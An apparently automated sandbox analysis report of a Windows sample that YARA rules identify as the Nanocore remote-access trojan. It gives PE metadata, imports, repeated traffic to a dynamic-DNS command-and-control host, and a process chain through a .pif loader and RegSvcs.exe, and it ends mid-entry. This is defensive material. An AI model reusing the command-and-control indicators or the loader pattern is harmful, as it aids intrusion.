              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3b5400x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3b5740x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x4c28.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x210c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x397d00x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x342180x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x320000x260.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3aaec0x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x305810x30600False0.589268410853data6.70021125825IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x320000xa3320xa400False0.455030487805data5.23888424127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3d0000x238b00x1200False0.368272569444data3.83993526939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .gfids0x610000xe80x200False0.333984375data2.12166381533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x620000x4c280x4e00False0.602263621795data6.36874241417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x670000x210c0x2200False0.786534926471data6.61038519378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              PNG0x625240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
              PNG0x6306c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
              RT_ICON0x646180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870
              RT_DIALOG0x649000x286dataEnglishUnited States
              RT_DIALOG0x64b880x13adataEnglishUnited States
              RT_DIALOG0x64cc40xecdataEnglishUnited States
              RT_DIALOG0x64db00x12edataEnglishUnited States
              RT_DIALOG0x64ee00x338dataEnglishUnited States
              RT_DIALOG0x652180x252dataEnglishUnited States
              RT_STRING0x6546c0x1e2dataEnglishUnited States
              RT_STRING0x656500x1ccdataEnglishUnited States
              RT_STRING0x6581c0x1b8dataEnglishUnited States
              RT_STRING0x659d40x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
              RT_STRING0x65b1c0x446dataEnglishUnited States
              RT_STRING0x65f640x166dataEnglishUnited States
              RT_STRING0x660cc0x152dataEnglishUnited States
              RT_STRING0x662200x10adataEnglishUnited States
              RT_STRING0x6632c0xbcdataEnglishUnited States
              RT_STRING0x663e80xd6dataEnglishUnited States
              RT_GROUP_ICON0x664c00x14data
              RT_MANIFEST0x664d40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              10/12/21-12:35:17.105237UDP254DNS SPOOF query response with TTL of 1 min. and no authority53565278.8.8.8192.168.2.3
              10/12/21-12:35:27.793788UDP254DNS SPOOF query response with TTL of 1 min. and no authority53632978.8.8.8192.168.2.3
              10/12/21-12:35:49.817168UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505858.8.8.8192.168.2.3

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 12, 2021 12:34:39.302180052 CEST4974948562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:39.333434105 CEST4856249749185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:39.836667061 CEST4974948562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:45.852648973 CEST4974948562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:45.874392033 CEST4856249749185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:50.498975992 CEST4975048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:50.511337042 CEST4856249750185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:51.012556076 CEST4975048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:51.031879902 CEST4856249750185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:51.540771008 CEST4975048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:51.559568882 CEST4856249750185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:55.649027109 CEST4975348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:55.661557913 CEST4856249753185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:56.165998936 CEST4975348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:56.186877966 CEST4856249753185.19.85.175192.168.2.3
              Oct 12, 2021 12:34:56.697384119 CEST4975348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:34:56.759829044 CEST4856249753185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:00.777183056 CEST4975548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:00.817528009 CEST4856249755185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:01.322834969 CEST4975548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:01.350032091 CEST4856249755185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:01.855190039 CEST4975548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:01.866583109 CEST4856249755185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:06.447288036 CEST4975948562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:06.482518911 CEST4856249759185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:07.026285887 CEST4975948562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:07.047501087 CEST4856249759185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:07.713937044 CEST4975948562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:07.754251003 CEST4856249759185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:11.762847900 CEST4976148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:11.779544115 CEST4856249761185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:12.401781082 CEST4976148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:12.426014900 CEST4856249761185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:13.011132956 CEST4976148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:13.029988050 CEST4856249761185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:17.107378960 CEST4976848562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:17.131784916 CEST4856249768185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:17.714668989 CEST4976848562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:17.734659910 CEST4856249768185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:18.402311087 CEST4976848562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:18.422707081 CEST4856249768185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:22.579909086 CEST4977048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:22.618247032 CEST4856249770185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:23.121464968 CEST4977048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:23.149975061 CEST4856249770185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:23.652709007 CEST4977048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:23.664050102 CEST4856249770185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:27.795417070 CEST4977148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:27.807286024 CEST4856249771185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:28.309354067 CEST4977148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:28.326061010 CEST4856249771185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:28.840661049 CEST4977148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:28.862910986 CEST4856249771185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:32.874530077 CEST4977748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:32.899178982 CEST4856249777185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:33.536761045 CEST4977748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:33.559458017 CEST4856249777185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:34.169207096 CEST4977748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:34.186187029 CEST4856249777185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:38.208539009 CEST4980048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:38.231256008 CEST4856249800185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:38.732403040 CEST4980048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:38.743635893 CEST4856249800185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:39.248397112 CEST4980048562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:39.268146992 CEST4856249800185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:44.512033939 CEST4980248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:44.547193050 CEST4856249802185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:45.114006996 CEST4980248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:45.153135061 CEST4856249802185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:45.717047930 CEST4980248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:45.738914967 CEST4856249802185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:49.818686962 CEST4981248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:49.833676100 CEST4856249812185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:50.514432907 CEST4981248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:50.539594889 CEST4856249812185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:51.045687914 CEST4981248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:51.073875904 CEST4856249812185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:55.140722036 CEST4982148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:55.210638046 CEST4856249821185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:55.718004942 CEST4982148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:55.749516964 CEST4856249821185.19.85.175192.168.2.3
              Oct 12, 2021 12:35:56.249275923 CEST4982148562192.168.2.3185.19.85.175
              Oct 12, 2021 12:35:56.273762941 CEST4856249821185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:00.404426098 CEST4982248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:00.417629957 CEST4856249822185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:00.921530008 CEST4982248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:00.955311060 CEST4856249822185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:01.468419075 CEST4982248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:01.512979984 CEST4856249822185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:05.582500935 CEST4982748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:05.613492966 CEST4856249827185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:06.129812956 CEST4982748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:06.141463041 CEST4856249827185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:06.659672022 CEST4982748562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:06.671129942 CEST4856249827185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:10.689080954 CEST4984248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:10.754615068 CEST4856249842185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:11.265531063 CEST4984248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:11.284606934 CEST4856249842185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:11.790812016 CEST4984248562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:11.821477890 CEST4856249842185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:15.837282896 CEST4984348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:15.860461950 CEST4856249843185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:16.369263887 CEST4984348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:16.389642000 CEST4856249843185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:16.908663988 CEST4984348562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:16.933974028 CEST4856249843185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:21.962171078 CEST4984548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:22.013202906 CEST4856249845185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:22.515898943 CEST4984548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:22.536120892 CEST4856249845185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:23.047388077 CEST4984548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:23.062324047 CEST4856249845185.19.85.175192.168.2.3

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 12, 2021 12:34:39.230012894 CEST6402153192.168.2.38.8.8.8
              Oct 12, 2021 12:34:39.248326063 CEST53640218.8.8.8192.168.2.3
              Oct 12, 2021 12:34:50.479154110 CEST6078453192.168.2.38.8.8.8
              Oct 12, 2021 12:34:50.497493029 CEST53607848.8.8.8192.168.2.3
              Oct 12, 2021 12:34:55.622173071 CEST5902653192.168.2.38.8.8.8
              Oct 12, 2021 12:34:55.640309095 CEST53590268.8.8.8192.168.2.3
              Oct 12, 2021 12:35:17.085382938 CEST5652753192.168.2.38.8.8.8
              Oct 12, 2021 12:35:17.105237007 CEST53565278.8.8.8192.168.2.3
              Oct 12, 2021 12:35:22.561073065 CEST5265053192.168.2.38.8.8.8
              Oct 12, 2021 12:35:22.577892065 CEST53526508.8.8.8192.168.2.3
              Oct 12, 2021 12:35:27.773935080 CEST6329753192.168.2.38.8.8.8
              Oct 12, 2021 12:35:27.793787956 CEST53632978.8.8.8192.168.2.3
              Oct 12, 2021 12:35:49.796987057 CEST5058553192.168.2.38.8.8.8
              Oct 12, 2021 12:35:49.817167997 CEST53505858.8.8.8192.168.2.3
              Oct 12, 2021 12:35:55.119167089 CEST5510853192.168.2.38.8.8.8
              Oct 12, 2021 12:35:55.138731003 CEST53551088.8.8.8192.168.2.3
              Oct 12, 2021 12:36:00.383613110 CEST5894253192.168.2.38.8.8.8
              Oct 12, 2021 12:36:00.402153969 CEST53589428.8.8.8192.168.2.3
              Oct 12, 2021 12:36:21.926038980 CEST6349053192.168.2.38.8.8.8
              Oct 12, 2021 12:36:21.944379091 CEST53634908.8.8.8192.168.2.3

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Oct 12, 2021 12:34:39.230012894 CEST192.168.2.38.8.8.80xa4cStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:34:50.479154110 CEST192.168.2.38.8.8.80x58abStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:34:55.622173071 CEST192.168.2.38.8.8.80xbb40Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:35:17.085382938 CEST192.168.2.38.8.8.80x43bbStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:35:22.561073065 CEST192.168.2.38.8.8.80x608dStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:35:27.773935080 CEST192.168.2.38.8.8.80x600bStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:35:49.796987057 CEST192.168.2.38.8.8.80x64ecStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:35:55.119167089 CEST192.168.2.38.8.8.80x8c85Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:36:00.383613110 CEST192.168.2.38.8.8.80x52dfStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
              Oct 12, 2021 12:36:21.926038980 CEST192.168.2.38.8.8.80x5a76Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Oct 12, 2021 12:34:39.248326063 CEST8.8.8.8192.168.2.30xa4cNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:34:50.497493029 CEST8.8.8.8192.168.2.30x58abNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:34:53.358833075 CEST8.8.8.8192.168.2.30x83ccNo error (0)windowsupdate.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)
              Oct 12, 2021 12:34:55.640309095 CEST8.8.8.8192.168.2.30xbb40No error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:35:17.105237007 CEST8.8.8.8192.168.2.30x43bbNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:35:22.577892065 CEST8.8.8.8192.168.2.30x608dNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:35:27.793787956 CEST8.8.8.8192.168.2.30x600bNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:35:49.817167997 CEST8.8.8.8192.168.2.30x64ecNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:35:55.138731003 CEST8.8.8.8192.168.2.30x8c85No error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:36:00.402153969 CEST8.8.8.8192.168.2.30x52dfNo error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)
              Oct 12, 2021 12:36:21.944379091 CEST8.8.8.8192.168.2.30x5a76No error (0)strongodss.ddns.net185.19.85.175A (IP address)IN (0x0001)

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: dAkJsQr7A9.exe PID: 6308 Parent PID: 3652

              General

              Start time:12:34:10
              Start date:12/10/2021
              Path:C:\Users\user\Desktop\dAkJsQr7A9.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\dAkJsQr7A9.exe'
              Imagebase:0xca0000
              File size:1103745 bytes
              MD5 hash:B115228FE5E180F505C081AA829C1A86
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Chronological Activities

              Analysis Process: xmjk.pif PID: 6660 Parent PID: 6308

              General

              Start time:12:34:23
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 37%, Metadefender, Browse
              • Detection: 56%, ReversingLabs
              Reputation:low

              Chronological Activities

              Analysis Process: RegSvcs.exe PID: 5792 Parent PID: 6660

              General

              Start time:12:34:31
              Start date:12/10/2021
